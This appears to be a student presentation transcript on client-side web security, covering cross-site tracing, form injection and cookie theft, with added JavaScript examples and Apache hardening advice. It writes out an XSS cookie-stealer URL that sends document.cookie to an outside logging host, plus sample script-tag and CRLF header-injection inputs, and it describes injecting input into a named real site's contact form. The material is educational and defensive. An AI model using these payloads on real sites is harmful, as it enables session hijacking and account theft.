Client-Site Security

Added: August 30, 2008
Presentation Transcript

Client-site security
Project Guide: Dr. Anurika Vaish
By: Sushil Rai, IMS2007032


Goal of the Project: This project aims to find the vulnerabilities on the client side and to analyse them with respect to secure client communication. It also covers vulnerabilities that arise on the client side from carelessness and misconfiguration of the client and server, and gives the recommendations needed to protect the client from attackers.


Tools and platform: Tools: Wireshark 1.0. Platform: Linux/Windows. Web server: Apache.


Domains of Network Security (diagram slide)


Finding Vulnerabilities: To find the security loopholes I applied two approaches, which are as follows: 1. Inserting input arguments (in the form of a script) in the address bar. 2. Inserting false parameter values in the input form fields.


Algorithm to find XSS: 1. Using the TRACE method. 2. Inserting false parameter values in the input form fields. The TRACE method is an echo mechanism of the HTTP protocol: a TRACE request is sent to a web server that supports the method, and the server sends back a response whose body is the request exactly as it received it, including the request headers. Because the echoed headers include the Cookie header, a script that can issue a TRACE request to the server can read the user's cookie back out of the response (cross-site tracing).


Snapshot from Wireshark 1.0.0 (screenshot slide)


Now the attacker can send a script to get a response from the TRACE method (screenshot slide).
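The TRACE exchange described on the two slides above, as an added example that is not part of the original presentation. Both sides are simulated in Node.js so it runs offline: one function stands in for a server with TRACE enabled (which, per RFC 7231, echoes the request back as a message/http body), another for a server that refuses the method, and the client-side part pulls the Cookie header out of the echo. The host name, cookie value and server behaviour are constructed for illustration. One caveat for today's browsers: XMLHttpRequest and fetch refuse to send TRACE at all, so the in-browser version of this attack only worked in old browsers or plug-ins; disabling TRACE on the server is still what removes the echo for any client.

```javascript
// Added example (not from the original slides): a simulated HTTP TRACE exchange
// showing why an enabled TRACE method lets a script read the browser's cookies.
// Client request and server behaviour are both constructed here; no real host
// is contacted.

const CRLF = "\r\n";

// Build the raw TRACE request a script or tool would send. The Cookie header is
// what the attacker hopes to read back; the value is a constructed sample.
function buildTraceRequest(host, path, cookie) {
  return [
    `TRACE ${path} HTTP/1.1`,
    `Host: ${host}`,
    `Cookie: ${cookie}`,
    "Max-Forwards: 0",
    "", "",
  ].join(CRLF);
}

// Stand-in for a server with TRACE enabled: per RFC 7231 section 4.3.8 it
// replies 200 with Content-Type message/http and the request it received
// as the body, headers included.
function traceEnabledServer(rawRequest) {
  return [
    "HTTP/1.1 200 OK",
    "Content-Type: message/http",
    `Content-Length: ${Buffer.byteLength(rawRequest)}`,
    "", rawRequest,
  ].join(CRLF);
}

// Stand-in for a hardened server (e.g. Apache with the RewriteRule from the
// recommendation slide): TRACE is refused with 403 and nothing is echoed.
function traceDisabledServer(rawRequest) {
  const method = rawRequest.split(" ")[0];
  const status = method === "TRACE" ? "403 Forbidden" : "200 OK";
  return [`HTTP/1.1 ${status}`, "Content-Length: 0", "", ""].join(CRLF);
}

// What the attacker's script does with the response: split headers from body
// and look for an echoed Cookie header. Returns the cookie value or null.
function extractEchoedCookie(rawResponse) {
  const sep = rawResponse.indexOf(CRLF + CRLF);
  if (sep === -1) return null;
  const head = rawResponse.slice(0, sep);
  const body = rawResponse.slice(sep + 4);
  const statusLine = head.split(CRLF)[0];
  if (!statusLine.startsWith("HTTP/1.1 200")) return null;
  const m = body.match(/^Cookie:[ \t]*([^\r\n]*)/im);
  return m ? m[1].trim() : null;
}

// Wire it together: true if the server leaks the cookie back to the script.
function traceLeaksCookie(server, host, cookie) {
  const resp = server(buildTraceRequest(host, "/", cookie));
  return extractEchoedCookie(resp) === cookie;
}

const SAMPLE_COOKIE = "PHPSESSID=c0ffee1234567890"; // constructed sample value

if (typeof module !== "undefined" && require.main === module) {
  console.log("TRACE enabled, cookie leaked:",
    traceLeaksCookie(traceEnabledServer, "www.example.com", SAMPLE_COOKIE));
  console.log("TRACE disabled, cookie leaked:",
    traceLeaksCookie(traceDisabledServer, "www.example.com", SAMPLE_COOKIE));
}
```

Run it with `node trace_echo.js`; the first line prints `true` (the echo contains the cookie), the second `false`. Against a real server the same check is `curl -i -X TRACE http://host/` followed by a look for your own headers in the body.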


Recommendation: To disable the TRACE method, the system administrator needs to add the following to the main Apache config file, outside of any virtual host or directory block (mod_rewrite must be loaded):
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
The rule answers every TRACE request with 403 Forbidden. Note that mod_rewrite rules in the main server config are not inherited by virtual hosts unless they set RewriteOptions Inherit, so each virtual host needs the rule or the inherit option. Apache 1.3.34, 2.0.55 and later also provide the TraceEnable directive, which switches the method off without mod_rewrite.


Vulnerability against form splitting: Basically in this method we try to search for the input points, pass invalid inputs and check whether the server accepts them or not. If any invalid input is accepted by the web server then that particular web application is vulnerable. I started navigating the pages of RIL one by one, but I was not finding any input fields of this kind; before the end of the navigation I stopped at the last page, which was CONTACT US. This page has 14 input fields, as can be seen in the snapshot below.


Inserting malicious code as input (screenshot slide)


Malicious code is accepted by the server (screenshot slide)


Recommendations: To protect an application from a form-splitting attack we have to do the following: 1. Validate all HTTP request headers. 2. Validate all stored cookies. 3. Check all query strings. 4. Validate all form fields. 5. Check all hidden fields.
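One way to implement recommendations 4 and 5 on the server side for a contact form like the one on the slides, as an added example (not code from the original presentation or from RIL). The field names, allow-list rules and sample submissions are constructed for illustration. It rejects control characters as well as unexpected markup, since a CR/LF inside a value is what lets a form field turn into an injected header when the value is copied into an e-mail or a response, and it treats a hidden field as tampered with when its value is not the one the server rendered. Accepted values are still HTML-escaped before being shown back, because validation on its own is not a substitute for output encoding.

```javascript
// Added example (not from the original slides): server-side checks for the
// form-field and hidden-field recommendations, applied to a contact form.
// Rules, field names and the sample submissions are constructed.

// Allow-list rules per field. Hidden fields carry a fixed expected value the
// server itself rendered, so anything else means the client altered it.
const CONTACT_FORM_RULES = {
  name:    { maxLen: 60,   pattern: /^[\p{L}\p{M} .'-]+$/u },
  email:   { maxLen: 254,  pattern: /^[^\s@]+@[^\s@]+\.[^\s@]+$/ },
  phone:   { maxLen: 20,   pattern: /^\+?[0-9 ()-]+$/, optional: true },
  message: { maxLen: 2000, pattern: /^[^<>]*$/ },
  form_id: { hidden: true, expected: "contact-v1" },
};

// CR, LF and other control characters are refused in every field: they are
// what turns a form value into an injected header line downstream.
const CONTROL_CHARS = /[\x00-\x1f\x7f]/;

// Returns { ok: true, values } with trimmed values, or { ok: false, errors }.
// Fields not listed in the rules are dropped, never echoed.
function validateForm(rules, submitted) {
  const errors = [];
  const values = {};
  for (const [field, rule] of Object.entries(rules)) {
    const raw = submitted[field];
    if (rule.hidden) {
      if (raw !== rule.expected) errors.push(`${field}: hidden field altered`);
      continue;
    }
    if (raw === undefined || raw === "") {
      if (!rule.optional) errors.push(`${field}: required`);
      continue;
    }
    if (typeof raw !== "string") { errors.push(`${field}: not a string`); continue; }
    const v = raw.trim();
    if (v.length > rule.maxLen) { errors.push(`${field}: too long`); continue; }
    if (CONTROL_CHARS.test(v)) { errors.push(`${field}: control characters`); continue; }
    if (!rule.pattern.test(v)) { errors.push(`${field}: invalid characters`); continue; }
    values[field] = v;
  }
  return errors.length ? { ok: false, errors } : { ok: true, values };
}

// Output encoding for the confirmation page: accepted values are escaped
// before being placed into HTML, so validation is not the only defence.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Constructed sample submissions: one honest, one carrying the kind of input
// the slides describe (script in a field, CRLF in the e-mail, altered hidden field).
const GOOD_SUBMISSION = {
  name: "Sushil Rai", email: "sushil@example.com", phone: "+91 11 2345 6789",
  message: "Please call me back.", form_id: "contact-v1",
};
const BAD_SUBMISSION = {
  name: "x\"><script>alert(document.cookie)</script>",
  email: "attacker@example.com\r\nBcc: victim@example.org",
  message: "hi", form_id: "contact-v2",
};
```

`validateForm(CONTACT_FORM_RULES, BAD_SUBMISSION)` reports three errors (name, email, form_id) and the request is refused as a whole; the good submission comes back with four cleaned values, which are then passed through `escapeHtml` when rendered.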


Stealing cookies: Cookie stealing is one of the most dangerous kinds of attack that an attacker can impose on the client side. The steps are: 1. Finding an XSS vulnerability. 2. Creating a cookie-stealer script. 3. Logging the cookie, for example with a request like http://www.xyz.com/search.php?query=">location.href='http://abc.com/log.php?12386'+document.cookie;


Cookie in plain alphanumeric form (screenshot slide)


Recommendations: 1. Implement a cookie timeout. 2. Proper authentication of cookie credentials must be associated with an IP address. 3. We must provide a proper, working log-out function. 4. Do not store sensitive data in cookies in plain text. 5. Do not store weakly encrypted passwords in cookies.


Web browser based security: To protect the web browser we have to make the settings given below: 1. Select "ask me every time before accepting a cookie from a web site". 2. Select "warn me when sites try to install plug-ins". 3. Clear the check boxes "enable JavaScript" and "enable Java". 4. Clear all check boxes under "advanced JavaScript settings".


Thank You!!